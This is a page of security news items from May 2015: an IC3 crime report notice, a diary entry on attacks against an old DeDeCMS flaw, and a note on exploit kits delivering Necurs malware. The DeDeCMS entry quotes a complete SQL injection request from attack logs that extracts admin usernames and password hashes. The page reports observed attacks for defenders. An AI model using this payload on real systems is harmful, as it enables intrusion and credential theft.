Category: Research & Alerts

IC3 Issues Internet Crime Report for 2014 0

IC3 Issues Internet Crime Report for 2014

Original release date: May 22, 2015 The Internet Crime Complaint Center (IC3) has released its Internet Crime Report for 2014, indicating that scams relating to social media — including doxing, click-jacking, and pharming — have increased substantially over the past five years. US-CERT encourages users to review the IC3 Alert for details and refer to the US-CERT Tip ST04-014 for information on social engineering and phishing attacks. This product is provided subject to this Notification and this Privacy & Use policy.

Lazy Coordinated Attacks Against Old Vulnerabilities, (Fri, May 22nd) 0

Lazy Coordinated Attacks Against Old Vulnerabilities, (Fri, May 22nd)

Typically we try to device attackers into different groups, all the way from Script Kiddies (no resources, no skills, quite a bit of time/persistance) to more advanced state sponsored attackers (lots of resources, decent skills and ability to conduct long lasting persistent attacks). So it was a bit odd to see an attack against a rather old vulnerability in DeDeCMS”> The attack: GET /uploads/plus/search.php?keyword=11typeArr[%60@%27%60and%28SELECT1%20FROM%28selectcount%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29fromdede_adminLimit0,1%29%29afrominformation_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1 301 178 – Python-urllib/2.7 DeDeCMSis a Drupal like content management system popular in China [1]

Exploit kits delivering Necurs, (Thu, May 21st) 0

Exploit kits delivering Necurs, (Thu, May 21st)

Introduction In the past few days, weve seenNuclear and Anglerexploit kits (EKs) deliveringmalware identified as Necurs. It certainly isntthe only payload sentfrom Nuclear and otherEKs, but I hadnt really looked into EK traffic sending Necurs lately. Documented as early as 2012, Necurs is a type of malware that opens a back door on the infected computer [ 1 ]